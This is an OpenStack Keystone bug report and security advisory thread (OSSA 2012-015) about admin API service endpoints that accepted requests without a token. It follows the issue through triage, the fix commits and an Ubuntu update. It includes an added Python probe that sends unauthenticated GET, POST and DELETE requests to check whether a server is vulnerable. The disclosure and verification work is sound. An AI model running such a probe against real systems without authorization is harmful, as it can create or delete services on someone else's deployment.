[OSSA 2012-015] API v2.0/OS-KSADM/services, v2.0/OS-KSADM/services/{service_id} doesn't validate token

Bug #1006822 reported by Jason Xu on 2012-05-31
This bug affects 1 person
Affects / Assigned to
OpenStack Identity (keystone): Dolph Mathews
OpenStack Security Advisory: Russell Bryant
keystone (Ubuntu): unassigned

Bug Description

API (v2.0/OS-KSADM/services, v2.0/OS-KSADM/services/{service_id}) doesn't validate token

It can get, create and delete a service without an X-Auth-Token.

Attached is a diff of the changes.

Jason Xu (yinyangxu) wrote :
Jason Xu (yinyangxu) on 2012-05-31
summary: - API(v2.0/OS-KSADM/services,v2.0/OS-KSADM/services/{service_id})
+ API(v2.0/OS-KSADM/services,v2.0/OS-KSADM/services/{service_id})doesn't
+ validate token
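The following probe is an added example for this report; it is neither Keystone's code nor the reporter's attached diff. It sends each of the four operations named in the description without an X-Auth-Token and classifies the response. It assumes the admin API is reachable at a base URL (Keystone's conventional admin port 35357 by default) and takes a hypothetical service id for the per-service routes; run it only against a test deployment, because on a vulnerable server the POST and DELETE probes really create and delete a service.

```python
"""Probe whether a Keystone v2.0 admin API accepts OS-KSADM service
operations without an X-Auth-Token.

Added example for bug 1006822; not Keystone's own code and not the
reporter's reproducer.  Assumes an admin endpoint at BASE_URL (default
port 35357) and a hypothetical service id for the per-service routes.
"""
import json
import sys
import urllib.error
import urllib.request

DEFAULT_BASE_URL = "http://localhost:35357"  # assumed admin endpoint
DEFAULT_SERVICE_ID = "probe-service-id"      # hypothetical id, replace with a real one

# The four operations named in the report; {service_id} is filled in at run time.
# The POST body uses the v2.0 OS-KSADM service representation.
PROBES = [
    ("GET", "/v2.0/OS-KSADM/services", None),
    ("POST", "/v2.0/OS-KSADM/services",
     {"OS-KSADM:service": {"name": "probe", "type": "probe",
                           "description": "unauthenticated probe"}}),
    ("GET", "/v2.0/OS-KSADM/services/{service_id}", None),
    ("DELETE", "/v2.0/OS-KSADM/services/{service_id}", None),
]


def build_request(base_url, method, path, body=None):
    """Build the request as an anonymous caller would send it: JSON body
    when there is one, and deliberately no X-Auth-Token header."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(base_url + path, data=data, method=method)
    req.add_header("Accept", "application/json")
    if data is not None:
        req.add_header("Content-Type", "application/json")
    return req


def urllib_status(req):
    """Default sender: return the HTTP status code, treating 4xx/5xx as a
    result rather than an exception."""
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def classify(status):
    """Verdict for one tokenless request.

    401 (or 403) means the server refused before touching the catalog,
    which is the fixed behaviour.  Any 2xx means the operation ran with no
    token at all: the bug.  Anything else is reported as-is; note that a
    404 on a per-service route with an unknown id still means the handler
    reached the catalog lookup before any authorization check, so re-run
    with a known service id before concluding the server is protected.
    """
    if status in (401, 403):
        return "protected"
    if 200 <= status < 300:
        return "vulnerable"
    return "inconclusive (HTTP %d)" % status


def run_probes(base_url=DEFAULT_BASE_URL, service_id=DEFAULT_SERVICE_ID,
               send=urllib_status):
    """Run every probe without a token; return {"METHOD path": (status, verdict)}.

    `send` is injectable so the logic can be exercised without a live server.
    """
    results = {}
    for method, path_template, body in PROBES:
        path = path_template.format(service_id=service_id)
        status = send(build_request(base_url, method, path, body))
        results["%s %s" % (method, path)] = (status, classify(status))
    return results


def is_vulnerable(results):
    """True if any operation executed without a token."""
    return any(verdict == "vulnerable" for _, verdict in results.values())


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_BASE_URL
    sid = sys.argv[2] if len(sys.argv) > 2 else DEFAULT_SERVICE_ID
    for key, (status, verdict) in run_probes(base, sid).items():
        print("%-50s HTTP %s -> %s" % (key, status, verdict))
```

Usage: `python probe.py http://keystone-admin:35357 <existing-service-id>`. Against a patched server every line should read "protected"; any "vulnerable" line reproduces the report.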
Dolph Mathews (dolph) on 2012-06-02
Changed in keystone:
importance: Undecided → Critical
status: New → Triaged
milestone: none → folsom-2

I successfully deleted a service without providing an X-Auth-Token in the DELETE request at all: http://paste.openstack.org/raw/18322/

Changed in keystone:
assignee: nobody → Dolph Mathews (dolph)
status: Triaged → Confirmed

Fix proposed to branch: master
Review: https://review.openstack.org/8104

Changed in keystone:
status: Confirmed → In Progress
Alan Pevec (apevec) on 2012-06-04
tags: added: essex-backport

Reviewed: https://review.openstack.org/8104
Committed: http://github.com/openstack/keystone/commit/1d146f5c32e58a73a677d308370f147a3271c2cb
Submitter: Jenkins
Branch: master

commit 1d146f5c32e58a73a677d308370f147a3271c2cb
Author: Dolph Mathews <email address hidden>
Date: Sun Jun 3 11:00:54 2012 -0500

    Require authz for service CRUD (bug 1006822)

    Change-Id: Ia90f0aa2b856b9a9874d4865fb92ee913e8125c5

Changed in keystone:
status: In Progress → Fix Committed
Thierry Carrez (ttx) on 2012-07-04
Changed in keystone:
status: Fix Committed → Fix Released

Reviewed: https://review.openstack.org/9014
Committed: http://github.com/openstack/keystone/commit/24df3adb3f50cbb5ada411bc67aba8a781e6a431
Submitter: Jenkins
Branch: stable/essex

commit 24df3adb3f50cbb5ada411bc67aba8a781e6a431
Author: Dolph Mathews <email address hidden>
Date: Sun Jun 3 11:00:54 2012 -0500

    Require authz for service CRUD (bug 1006822)

    Change-Id: Ia90f0aa2b856b9a9874d4865fb92ee913e8125c5

tags: added: in-stable-essex
Dave Walker (davewalker) on 2012-08-24
Changed in keystone (Ubuntu):
status: New → Fix Released
Changed in keystone (Ubuntu Precise):
status: New → Confirmed

Please find the attached test log from the Ubuntu Server Team's CI infrastructure. As part of the verification process for this bug, Keystone has been deployed and configured across multiple nodes using precise-proposed as an installation source. After successful bring-up and configuration of the cluster, a number of exercises and smoke tests have been invoked to ensure the updated package did not introduce any regressions. A number of test iterations were carried out to catch any possible transient errors.

Please Note the list of installed packages at the top and bottom of the report.

For records of upstream test coverage of this update, please see the Jenkins links in the comments of the relevant upstream code-review(s):

Trunk review: https://review.openstack.org/8104
Stable review: https://review.openstack.org/9014

As per the provisional Micro Release Exception granted to this package by the Technical Board, we hope this contributes toward verification of this update.

The verification of this Stable Release Update has completed successfully and the package has now been released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regressions.

This bug was fixed in the package keystone - 2012.1+stable~20120824-a16a0ab9-0ubuntu2

keystone (2012.1+stable~20120824-a16a0ab9-0ubuntu2) precise-proposed; urgency=low

  * New upstream release (LP: #1041120):
    - debian/patches/0013-Flush-tenant-membership-deletion-before-user.patch:
  * Resynchronize with stable/essex:
    - authenticate in ldap backend doesn't return a list of roles
      (LP: #1035428)
    - LDAP should not check username on "sn" field (LP: #997700)
    - Admin API doesn't validate token. (LP: #1006815, #1006822)
    - Memcache token backend eventually stops working. (LP: #1012381)
    - EC2 credentials not migrated from legacy (diablo) database. (LP: #1016056)
    - Deleting tenants or users does not cleanup metadata. (LP: #973243)
    - Deleting tenants does not cleanup its user associations. (LP: #974199)
    - TokenNotFound not raised in testsuite because of timezone issues. (LP: #983800)
    - Token authentication for a user in a disabled tenant does not raise
      Unauthorized error. (LP: #988920)
    - export_legacy_catalog doesn't convert url names correctly. (LP: #994936)
    - Following a password compromise and subsequent password change,
      tokens remain valid. (LP: #996595)
    - Tokens remain valid after a user account is disabled. (LP: #997194)
 -- Adam Gandelman <email address hidden> Fri, 24 Aug 2012 03:34:59 -0400

Changed in keystone (Ubuntu Precise):
status: Confirmed → Fix Released
security vulnerability: no → yes
Thierry Carrez (ttx) on 2012-09-27
Changed in keystone:
milestone: folsom-2 → 2012.2
Russell Bryant (russellb) wrote :

An OSSA has been issued for this: https://lists.launchpad.net/openstack/msg17034.html

Thierry Carrez (ttx) on 2013-06-07
summary: - API(v2.0/OS-KSADM/services,v2.0/OS-KSADM/services/{service_id})doesn't
- validate token
+ [OSSA 2012-015] API(v2.0/OS-KSADM/services,v2.0/OS-
+ KSADM/services/{service_id})doesn't validate token
Changed in ossa:
assignee: nobody → Russell Bryant (russellb)
status: New → Fix Released
Thierry Carrez (ttx) on 2013-06-07
summary: - [OSSA 2012-015] API(v2.0/OS-KSADM/services,v2.0/OS-
- KSADM/services/{service_id})doesn't validate token
+ [OSSA 2012-015] API v2.0/OS-KSADM/services, v2.0/OS-
+ KSADM/services/{service_id} doesn't validate token